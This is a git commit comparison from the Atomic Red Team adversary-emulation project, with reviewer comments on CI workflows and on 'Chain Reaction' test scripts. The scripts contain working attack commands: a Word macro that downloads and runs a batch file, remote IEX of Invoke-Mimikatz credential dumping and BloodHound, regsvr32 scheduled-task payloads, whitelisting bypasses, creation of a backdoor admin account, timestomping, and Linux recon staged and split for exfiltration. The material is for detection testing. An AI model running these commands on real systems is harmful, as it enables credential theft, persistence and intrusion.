Compare commits

..

2 Commits

Author SHA1 Message Date
Keith McCammon f475ca3b1e Use site URL 2019-05-07 08:42:29 -06:00
Keith McCammon 0c4c29b19d Initial checkin of admin documentation. 2019-05-07 08:37:26 -06:00
1316 changed files with 186464 additions and 1605796 deletions
+51
@@ -0,0 +1,51 @@
version: 2
defaults: &defaults
docker:
- image: circleci/ruby:2.4
workflows:
version: 2
validate-then-generate-docs:
jobs:
- validate_atomics_generate_docs
jobs:
validate_atomics_generate_docs:
<<: *defaults
steps:
- checkout
- add_ssh_keys
- run:
name: Validate the format of atomic tests against the spec
command: |
bin/validate-atomics.rb
- run:
name: Generate nice markdown document for atomics
command: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
#elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then
# echo "Not committing documentation because we are on master and doc changes should be part of pull request branches"
elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then
echo "Not committing documentation because we are on a pull request branch that we don't have push permissions to"
else
git config credential.helper 'cache --timeout=120'
git config user.email "<email>"
git config user.name "CircleCI Atomic Red Team doc generator"
git add atomics
git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH"
git push -u origin $CIRCLE_BRANCH
fi
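Review bot: the branch guard at `elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]` only skips branches whose name contains "pull"; every other branch, master included, falls into the `else` arm and gets an automated `git commit -am` and `git push -u origin $CIRCLE_BRANCH` with the deploy key loaded by `add_ssh_keys`, while the master exclusion sits commented out two lines above. Restore the master check or make the job an explicit allow-list of branches it may push to. Two smaller points in the same block: `git add atomics` followed by `git commit -am` stages every tracked modification in the working tree, not just the generated docs, and `git config credential.helper 'cache --timeout=120'` does nothing when the remote is SSH, which is what `add_ssh_keys` implies.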
-29
@@ -1,29 +0,0 @@
---
name: Idea
about: An idea for a feature or improvement to Atomic Red Team.
title: 'Idea: '
labels: 'idea'
assignees: ''
---
### Use-cases
<!---
In order to properly evaluate a feature request, it is necessary to understand the use-cases for it.
Please describe below the _end goal_ you are trying to achieve that has led you to request this feature.
Please keep this section focused on the problem and not on the suggested solution. We'll get to that in a moment, below!
-->
### Proposal
<!---
If you have an idea for a way to address the problem via a change, please describe it below.
If you're not sure of some details, don't worry! When we evaluate the feature request we may suggest modifications.
-->
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
-19
@@ -1,19 +0,0 @@
---
name: Submit a new test
about: Submit a new Atomic Red Team atomic test.
title: 'TXXX: Your test name here'
labels: 'new-test'
assignees: ''
---
<!--
For reference, check out this article that explains how to properly submit a new atomic test: https://atomicredteam.io/contributing#how-to-contribute.
-->
### Technique ID: TXXXX
### Additional Details
<!--
Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
-->
-19
@@ -1,19 +0,0 @@
---
name: Website change
about: Propose a change to the website at https://atomicredteam.io
title: 'Website: '
labels: 'website'
assignees: ''
---
### Why the change?
### A summary of the change
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
@@ -1,11 +1,5 @@
---
name: Problem
about: Tell us about a problem you've encountered.
title: 'Problem: '
labels: 'problem'
assignees: ''
# Report
---
## What did you do?
Please replace this with what you did.
@@ -29,4 +23,4 @@ e.g. 💥
* If relevant, which [execution harness](2) are you attempting to use?
[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
-59
@@ -1,59 +0,0 @@
name: assign-labels
on:
workflow_run:
workflows: [ "validate-atomics" ]
types:
- completed
jobs:
assign-labels:
runs-on: ubuntu-latest
steps:
- name: download-artifact
uses: actions/github-script@v6
with:
script: |
let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
owner: context.repo.owner,
repo: context.repo.repo,
run_id: context.payload.workflow_run.id,
});
let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
return artifact.name == "labels.json"
})[0];
let download = await github.rest.actions.downloadArtifact({
owner: context.repo.owner,
repo: context.repo.repo,
artifact_id: matchArtifact.id,
archive_format: 'zip',
});
let fs = require('fs');
fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/labels.zip`, Buffer.from(download.data));
- name: unzip-artifact
run: unzip labels.zip
- name: assign-labels-and-reviewers
uses: actions/github-script@v6
with:
script: |
let fs = require('fs');
const obj = JSON.parse(fs.readFileSync('./labels.json'));
console.log(obj)
if(obj.labels.length > 0){
await github.rest.issues.addLabels({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
labels: obj.labels
})
}
if(obj.maintainers.length > 0){
await github.rest.issues.addAssignees({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
assignees: obj.maintainers
});
}
-37
@@ -1,37 +0,0 @@
name: generate-svg-counter
on:
push:
branches:
- master
jobs:
generate-counter:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: actions/setup-python@v4
with:
python-version: '3.11.2'
cache: 'poetry'
- name: Generate shields.io URL
run: python generate_shield.py atomics/
id: shield
- name: Generate shields.io URL
run: python generate_counter.py -d atomics/
id: counter
- name: Update README
run: |
sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
shell: bash
- name: update github with new site
run: |
# configure git to prep for commit
git config user.email "opensource@redcanary.com"
git config user.name "publish bot"
git config --global push.default simple
git add README.md
git commit --allow-empty -m "updating atomics count in README.md [ci skip]"
# push quietly to prevent showing the token in log
# no need to provide any credentials
git push
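Review bot: `${{ steps.counter.outputs.result }}` is expanded by the Actions expression engine directly into the `sed -i "s|...|...|" README.md` command line, so a `|`, a quote or any shell metacharacter in that output breaks the substitution or injects into the shell; pass it through an `env:` variable and quote it instead. The two steps both named `Generate shields.io URL` should have distinct names, and the `shield` step's output is never used. `cache: 'poetry'` is requested without poetry being installed in this job, and the comment `# no need to provide any credentials` should say why: the push relies on the token persisted by `actions/checkout@v3`.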
-63
@@ -1,63 +0,0 @@
name: generate-docs
on:
push:
branches:
- master
jobs:
generate-docs:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v2
with:
token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
ref: 'master'
- name: setup ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: 2.7
bundler-cache: true
- name: Generate and commit unique GUIDs for each atomic test
run: |
bin/generate-guids.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing GUID changes because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team GUID generator"
git add atomics
git commit -am "Generate GUIDs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [skip ci]"
git push origin $GITHUB_REF_NAME -f
fi
- name: generate markdown docs for atomics
run: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team doc generator"
git add atomics
git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
git push origin $GITHUB_REF_NAME -f
fi
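Review bot: both commit steps end in `git push origin $GITHUB_REF_NAME -f`, a force push to master with `PROTECTED_BRANCH_PUSH_TOKEN`. A docs generator should never need `-f`: the checkout is at the tip of the same ref, so a non-fast-forward only occurs when someone pushed in the meantime, and overwriting their commit is the wrong outcome. Drop `-f` and let the job fail and rerun. The `git config credential.helper 'cache --timeout=120'` lines are no-ops because `actions/checkout` already persists the token in the remote URL, and `actions/checkout@v2` should be brought in line with the `@v3` the other workflows use.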
-19
@@ -1,19 +0,0 @@
name: 'Close stale issues and PRs'
on:
schedule:
- cron: '30 1 * * *'
jobs:
stale:
runs-on: ubuntu-latest
steps:
- uses: actions/stale@v7
with:
stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
days-before-issue-stale: 30
days-before-pr-stale: 45
days-before-issue-close: 10
days-before-pr-close: 10
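Review bot: the issue timings disagree: `stale-issue-message` and `close-issue-message` both promise closure after 5 days, but `days-before-issue-close: 10`. Pick one value and use it in both messages and the setting; the PR side is consistent at 45 and 10.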
-80
@@ -1,80 +0,0 @@
name: validate-atomics
on:
pull_request:
branches:
- master
jobs:
validate-atomics:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v3
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v4
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction --no-root
- name: validate the format of atomics tests against the spec
run: |
poetry run python bin/validate/validate.py
validate-terraform:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: hashicorp/setup-terraform@v2
- name: Terraform fmt
id: fmt
run: terraform fmt -recursive -check
continue-on-error: false
upload:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v3
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v4
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- uses: actions/github-script@v6
id: get_pr_number
with:
script: |
if (context.issue.number) {
// Return issue number if present
return context.issue.number;
} else {
// Otherwise return issue number from commit
return (
await github.rest.repos.listPullRequestsAssociatedWithCommit({
commit_sha: context.sha,
owner: context.repo.owner,
repo: context.repo.repo,
})
).data[0].number;
}
result-encoding: string
- name: Install dependencies
run: poetry install --no-interaction --no-root
- name: save labels and reviewers into a file.
run: |
poetry run python bin/generate_labels.py -t ${{ secrets.GITHUB_TOKEN }} -pr '${{steps.get_pr_number.outputs.result}}'
- uses: actions/upload-artifact@v3
with:
name: labels.json
path: pr/
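Review bot: the `upload` job runs on `pull_request`, so `bin/generate_labels.py` executes from the PR head and the `pr/labels.json` it writes is attacker-controllable; combined with the `assign-labels` workflow that consumes the artifact with write permissions, a fork PR can set arbitrary labels and assignees. Computing labels from untrusted code is fine, but the privileged side must validate them. Also: `${{ secrets.GITHUB_TOKEN }}` is passed as the `-t` command-line argument, where it is visible to other processes on the runner; move it to an `env:` variable and read it from the environment. `${{steps.get_pr_number.outputs.result}}` is likewise interpolated straight into a shell command. In `get_pr_number`, `.data[0].number` throws on a commit with no associated pull request. `continue-on-error: false` in `validate-terraform` is the default and can go.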
-55
@@ -2,62 +2,7 @@
.DS_Store
.vscode
.atom
atomic-red-team/enterprise-attack.json
# Compiled Object files
*.slo
*.lo
*.o
*.obj
# vs logs
*.tlog
*.log
# Precompiled Headers
*.gch
*.pch
docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
# Credential files
*.creds
# Local .terraform directories
**/.terraform/*
# .tfstate files
*.tfstate
*.tfstate.*
**/*.terraform.lock.hcl
# Crash log files
crash.log
crash.*.log
# Ignore override files as they are usually used to override resources locally and so
# are not checked in
override.tf
override.tf.json
*_override.tf
*_override.tf.json
# Include override files you do wish to add to version control using negated pattern
# !example_override.tf
# Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan
# example: *tfplan*
# Ignore CLI configuration files
.terraformrc
terraform.rc
*.pyc
# The ExternalPayloads folder
ExternalPayloads
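Review bot: `**/*.terraform.lock.hcl` ignores the Terraform dependency lock file, which is the only thing pinning provider versions and checksums; HashiCorp's guidance is to commit it so every `terraform init` verifies the same provider artifacts. Ignoring `**/.terraform/*` and `*.tfstate*` is right, since state can contain secrets, but the lock file belongs in version control. `*.creds` under `# Credential files` is a sensible addition.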
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
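Review bot: `myURL = WinHttpReq.responseBody` overwrites the URL string with the binary response body and is never read again; delete it. `WinHttpReq.Open "GET", myURL, False, "username", "password"` sends placeholder credentials to a public raw.githubusercontent.com URL that needs none. The macro fetches the batch file from the `ARTifacts` branch, a moving ref, and runs it via `Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"` from a hard-coded `C:\Tools\`, which is at odds with this repository's own advice to execute from a server the tester controls; pin the URL to a commit and make the path configurable. `oStream` is also used without a `Dim`, which will break under `Option Explicit`.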
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
+1
@@ -0,0 +1 @@
# Chain Reactions
Binary file not shown.
+11
@@ -0,0 +1,11 @@
#include <stdio.h>
// Simple Hello World for Atomic Red Team payload
int main() {
printf("Hello from Atomic Red Team! \n");
return 0;
}
Binary file not shown.
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
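Review bot: `wget` and `curl` are aliases for `Invoke-WebRequest` only in Windows PowerShell 5.1; PowerShell 6 and later removed them, so this script fails there and the comment `# Note that these are alias' for Invoke-WebRequest.` should say so (and read "aliases"). `cmd.exe /c $temp\1.bat` executes a file fetched from the mutable `master` ref, whereas the Dragon's Tail scripts pin their payload to a commit SHA; do the same here.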
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
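Review bot: `Executing X86 AllTheThings Test` has neither `echo` nor a `::`/`REM` prefix, so cmd.exe tries to run a command named `Executing`, prints an error and carries on. Make it `echo Executing X86 AllTheThings Test`, and the AMD64 block below deserves the matching echo. The script also assumes `AllTheThingsx86.dll` and `AllTheThingsx64.dll` sit in the current directory; an `if not exist` check up front would give a clearer failure than eight LOLBin error dialogs.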
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
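Review bot: the T1117 payload is pinned to commit `6965fc15...`, but `Invoke-Mimikatz.ps1` is pulled from the `dev` branch of `EmpireProject/Empire`, a mutable third-party ref, which is precisely what the `NOTE` headers in the other chain reactions warn against; mirror it or pin a SHA. `Invoke-Mimikatz -DumpCreds` also needs an elevated session, which the header does not mention. The File Deletion step is disabled (`::del test.txt`), so `test.txt` with its 1945 timestamps is left on disk, while the PowerShell variant below does delete it; the two should agree, and if the leftover is intentional the comment should say so.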
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
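Review bot: the Account Discovery reference `https://attack.mitre.org/wiki/Windows_Technique_Matrix` points at the matrix rather than the technique; the Ranger script uses T1087 for the same step. `dir /s c:\ >> %temp%\download` appends a full-disk listing on every run and nothing removes it. `Get-BloodHoundData` is loaded from `BloodHoundAD/BloodHound` master, a mutable third-party ref, despite the `NOTE` at the top of this very file about not executing scripts from repositories you do not control.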
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
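Review bot: `powershell.exe "IEX (New-Object Net.WebClient).DownloadString('.../Discovery.bat')" > output.txt` feeds batch syntax (`::` comments, `%var%` expansion) to `Invoke-Expression`, which errors out instead of running the discovery commands; download to a `.bat` and run it with `cmd /c`, as the Argonaut script does. The scheduled task `Atomic Testing` (every 30 minutes, hitting GitHub and spawning calc) and the local administrator `Trevor` with password `SmshBgr123` are created with no cleanup, unlike Dragon's Tail which deletes its task; add `SCHTASKS /Delete /TN "Atomic Testing" /F` and `net user Trevor /delete`, or document the leftovers in the header. The `Net user /add` step is labelled `Tactic: Credential Access`, but T1136 Create Account is a Persistence technique.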
+106
@@ -0,0 +1,106 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hidden Files and Directories https://attack.mitre.org/wiki/Technique/T1158
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Data Compresssed https://attack.mitre.org/wiki/Technique/T1002
# Technique: Data Encrypted https://attack.mitre.org/wiki/Technique/T1022
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File https://attack.mitre.org/wiki/Technique/T1107
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
# rm -rf /tmp/.exfil/
